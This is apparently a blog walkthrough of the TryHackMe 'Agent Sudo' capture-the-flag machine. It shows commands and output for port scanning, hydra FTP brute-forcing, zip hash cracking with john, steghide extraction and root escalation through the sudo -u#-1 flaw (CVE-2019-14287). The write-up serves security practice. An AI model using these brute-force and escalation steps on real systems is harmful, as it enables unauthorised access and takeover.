Tryhackme Agent Sudo

[TASK 1] Introduction#

In this post we will try another machine called Agent-Sudo created by Deskel For Tryhackme. The difficulty level shows that this machine is easy.

The machine requires hash-cracking,Stegnography and Bruteforce to capture the flags

There are Total of 5 Task are available for this machine.

[TASK 2] Enumeration#

As always lets Scan for the availble ports of this machine.

1
nmap -sC -sV -oA initial 10.10.86.64

1
─[zen-prime@zerr0-satellite]─[~/htb/agent-sudo]
2
└──╼ [★]$ nmap -sC -sV -oA initial 10.10.86.64
3
# Nmap 7.80 scan initiated Mon Sep 14 13:37:24 2020 as: nmap -sC -sV -oA
4
    initial 10.10.86.64
5
Nmap scan report for 10.10.86.64
6
Host is up (0.32s latency).
7
Not shown: 997 closed ports
8
PORT   STATE SERVICE VERSION
9
21/tcp open  ftp     vsftpd 3.0.3
10
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
11
| ssh-hostkey:
12
|   2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
13
|   256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
14
|_  256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
15
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
16
|_http-server-header: Apache/2.4.29 (Ubuntu)
17
|_http-title: Annoucement
18
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
19

20
Service detection performed. Please report any incorrect results at
21
https://nmap.org/submit/ .
22
# Nmap done at Mon Sep 14 13:37:54 2020 -- 1 IP address (1 host up)
23
 scanned in 30.17 seconds

As Result Nmap shows that there are 3 ports are available in this machine

So First we will checkout the webserver running on port 80

WebServer

From the above text it shows that we need to set our own custom user-agent inorder to continue access to this site.

The Codename will also something be like Agent R

After some little bit of Manual tries i found that the codename is a Single Alphabet Character.

So lets change our User-Agent to C in an User-Agent Switcher Extension

Custom User Agent Strings

After Changeing our User-Agent we will be redirected to an new page of Another Agent

New Page

From the Text . it says that The password of this new Agent is weak.

[TASK 3] Hash Cracking and Bruteforce#

From our nmap result we identifies there is an Ftp Service is Running on this machine.

So First we will try wheather it is crackble for this new Agent using some common password list.

Lets Fire up our hydra

1
hydra -l **** -P rockyou.txt -t 16 ftp://10.10.86.64

1
 ─[zen-prime@zerr0-satellite]─[~/htb/agent-sudo]
2
└──╼ [★]$ hydra -l ***** -P /usr/share/wordlists/rockyou.txt  -t 16 ftp://10.10.86.64
3
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service
4
organizations, or for illegal purposes.
5

6
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-13 18:09:29
7
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries
8
(l:1/p:14344399),~896525 tries per task
9
[DATA] attacking ftp://10.10.86.64:21/
10
[STATUS] 240.00 tries/min, 240 tries in 00:01h, 14344159 to do in 996:08h, 16 active
11
[21][ftp] host: 10.10.86.64   login: *****  password: *****
12
1 of 1 target successfully completed, 1 valid password found
13
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-13 18:10:38

Now we got the password for accessing the FTP of this Agent

1
ftp 10.10.86.64

1
 ─[zen-prime@zerr0-satellite]─[~/htb/agent-sudo]
2
└──╼ [★]$ ftp 10.10.86.64
3
Connected to 10.10.86.64.
4
220 (vsFTPd 3.0.3)
5
Name (10.10.86.64:zen-prime): *****
6
331 Please specify the password.
7
Password:
8
230 Login successful.
9
Remote system type is UNIX.
10
Using binary mode to transfer files.
11
ftp>

Now we Successfully logined to the ftp of this machine.

From the FTP we got 2 images and 1 text file for Agent J using get command

Contents From FTP

From The Message **To_agentJ.txt ** we can understand that the login password for our Second Agent C is stored inside one of this pictures.

1
─[zen-prime@zerr0-satellite]─[~/htb/agent-sudo/ftp]
2
└──╼ [★]$ cat To_agentJ.txt
3
Dear agent J,
4

5
All these alien like photos are fake! Agent R stored the real picture inside your
6
directory.
7
Your login password is somehow stored in the fake picture. It shouldn't
8
be a problem for you.
9

10
From,
11
Agent C

First i run strings command againts both these pictures. From the result of cutie.png we identifies that there is something hided inside this picture.

so we can use the binwalk to extract from this

1
binwalk -e cutie.png

1
─[zen-prime@zerr0-satellite]─[~/htb/agent-sudo/ftp]
2
└──╼ [★]$ binwalk -e cutie.png
3

4
DECIMAL       HEXADECIMAL     DESCRIPTION
5
--------------------------------------------------------------------------------
6
0             0x0             PNG image, 528 x 528, 8-bit colormap, non-interlaced
7
869           0x365           Zlib compressed data, best compression
8
34562         0x8702          Zip archive data, encrypted compressed size: 98,
9
                              uncompressed size: 86,
10
name: To_agentR.txt
11
34820         0x8804          End of Zip archive, footer length: 22

Binwalk sucessfully extracted a Zip File from the image .but it was encrypted.

Its time to crack this encryption.So we used zip2jhon for our work.

1
zip2jhon 8702.zip> hash.txt

and then we pass this hash.txt to john for cracking the encryption here we used the password list rockyou.txt as wordlist.

1
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

1
─[zen-prime@zerr0-satellite]─[~/htb/agent-sudo/ftp/_cutie.png.extracted]
2
└──╼ [★]$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
3
Using default input encoding: UTF-8
4
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 128/128 SSE2 4x])
5
Press 'q' or Ctrl-C to abort, almost any other key for status
6
*****            (8702.zip/To_agentR.txt)
7
1g 0:00:00:04 DONE (2020-09-13 18:47) 0.2057g/s 4826p/s 4826c/s 4826C/s
8
azulita..301088
9
Use the "--show" option to display all of the cracked passwords reliably
10
Session completed

Now we also got the password for the 8702.zip lets extract it using this password.

After Extraction we got a new message from Agent R

1
─[zen-prime@zerr0-satellite]─[~/htb/agent-sudo/ftp/_cutie.png.extracted]
2
└──╼ [★]$ cat To_agentR.txt
3
Agent C,
4

5
We need to send the picture to 'Q*******' as soon as possible!
6

7
By,
8
Agent R

From The Message we got a base64 encoded string Q****** . so we will decode it using this command

1
echo "Q*******" | base64 -d

1
─[zen-prime@zerr0-satellite]─[~/htb/agent-sudo/ftp/_cutie.png.extracted]
2
└──╼ [★]$ echo "QXJlYTUx" | base64 -d
3
A*****

After decoding that string we got a new password.From the message of Agent R we can understand that this password can be used to extract content from our next image cute-alien.jpg

So we can now use steghide tool to extract the content which hidden in it.

1
steghide extract -sf cute-alien.jpg

1
─[zen-prime@zerr0-satellite]─[~/htb/agent-sudo/ftp]
2
└──╼ [★]$ steghide extract -sf cute-alien.jpg
3
Enter passphrase:
4
wrote extracted data to "message.txt".

Now we got a new file message.txt from it. Lets check it.

1
 ─[zen-prime@zerr0-satellite]─[~/htb/agent-sudo/ftp]
2
└──╼ [★]$ cat message.txt
3
Hi james,
4

5
Glad you find this message. Your login password is h*********s*
6

7
Don't ask me why the password look cheesy, ask agent R who set this password for
8
 you.
9

10
Your buddy,
11
chris

After Viewing the Message of our Chris . we got the login password for our James in the machine.

[TASK 4] Capture the user flag#

Now we have the login password for James in our hand.and we noticed that this machine has an ssh service

so we can now use this service to login in this machine

1
ssh james@10.10.86.64

1
─[zen-prime@zerr0-satellite]─[~/htb/agent-sudo/ftp]
2
└──╼ [★]$ ssh james@10.10.86.64
3
The authenticity of host '10.10.86.64 (10.10.86.64)' can't be established.
4
ECDSA key fingerprint is SHA256:yr7mJyy+j1G257OVtst3Zkl+zFQw8ZIBRmfLi7fX/D8.
5
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
6
Warning: Permanently added '10.10.86.64' (ECDSA) to the list of known hosts.
7
james@10.10.86.64's password:
8

9
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)
10

11
* Documentation:  https://help.ubuntu.com
12
* Management:     https://landscape.canonical.com
13
* Support:        https://ubuntu.com/advantage
14

15
System information disabled due to load higher than 1.0
16

17

18
75 packages can be updated.
19
33 updates are security updates.
20

21

22
Last login: Tue Oct 29 14:26:27 2019
23

24

25
james@agent-sudo:~$

Here we logged Successfully to this machine on james account.

Now it times to find the user flag

1
james@agent-sudo:~$ ls -la
2
total 80
3
drwxr-xr-x 4 james james  4096 Oct 29  2019 .
4
drwxr-xr-x 3 root  root   4096 Oct 29  2019 ..
5
-rw------- 1 root  root    566 Oct 29  2019 .bash_history
6
-rw-r--r-- 1 james james   220 Apr  4  2018 .bash_logout
7
-rw-r--r-- 1 james james  3771 Apr  4  2018 .bashrc
8
drwx------ 2 james james  4096 Oct 29  2019 .cache
9
drwx------ 3 james james  4096 Oct 29  2019 .gnupg
10
-rw-r--r-- 1 james james   807 Apr  4  2018 .profile
11
-rw-r--r-- 1 james james     0 Oct 29  2019 .sudo_as_admin_successful
12
-rw-r--r-- 1 james james 42189 Jun 19  2019 Alien_autospy.jpg
13
-rw-r--r-- 1 james james    33 Oct 29  2019 user_flag.txt
14
james@agent-sudo:~$ cat user_flag.txt
15
b******e*****************5*****7

we Captured the user flag

Here we can also see that there also an image Alien_autospy.jpg

we can now grab that image

To transfer this image back to our machine.

we use a command called sftp.

1
sftp james@10.10.83.64

1
─[zen-prime@zerr0-satellite]─[~/htb/agent-sudo/ftp]
2
└──╼ [★]$ sftp james@10.10.74.50
3
james@10.10.74.50's password:
4
Connected to 10.10.74.50.
5
sftp> dir
6
Alien_autospy.jpg  user_flag.txt
7
sftp> get Alien_autospy.jpg
8
Fetching /home/james/Alien_autospy.jpg to Alien_autospy.jpg
9
/home/james/Alien_autospy.jpg
10
sftp>

We got an image of an alien.From the hint of our Question #2 From TASK 4.We Just Tried a Reverse image search using Google.

and Got Some relavent Results.

[TASK 5] Privilege Escalation#

Let’s check what commands can user james can run wih elevated permission

1
sudo -l

1
james@agent-sudo:~$ sudo -l
2
[sudo] password for james:
3
Matching Defaults entries for james on agent-sudo:
4
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:
5
    /usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
6

7
User james may run the following commands on agent-sudo:
8
    (ALL, !root) /bin/bash
9
james@agent-sudo:~$

Wow here user James can Run Everything

let’s what version of sudo is running on this machine.

1
sudo -V

1
james@agent-sudo:~$ sudo -V
2
Sudo version 1.8.21p2
3
Sudoers policy plugin version 1.8.21p2
4
Sudoers file grammar version 46
5
Sudoers I/O plugin version 1.8.21p2

Upon Seacrching this sudo version on google we got the CVE for this vulnerablitiy

CVE-2019-14287

1
sudo -u#-1 /bin/bash

1
james@agent-sudo:~$ whoami
2
james
3
james@agent-sudo:~$ sudo -u#-1 /bin/bash
4
root@agent-sudo:~# whoami
5
root

Now we are Root User.Let open our root flag

1
root@agent-sudo:~# cd /root/
2
root@agent-sudo:/root# ls -la
3
total 32
4
drwx------  4 root root 4096 Oct 29  2019 .
5
drwxr-xr-x 24 root root 4096 Oct 29  2019 ..
6
-rw-------  1 root root 1952 Oct 29  2019 .bash_history
7
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
8
drwxr-xr-x  3 root root 4096 Oct 29  2019 .local
9
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
10
drwx------  2 root root 4096 Oct 29  2019 .ssh
11
-rw-r--r--  1 root root  197 Oct 29  2019 root.txt
12

13

14
root@agent-sudo:/root# cat root.txt
15
To Mr.hacker,
16

17
Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.
18

19
Your flag is
20
b************4**************c***
21

22
By,
23
DesKel a.k.a Agent R
24
root@agent-sudo:/root#

Conclusion#

Hope we learned some new things from this machine. and also Agent R is our author DesKel.

Thanks .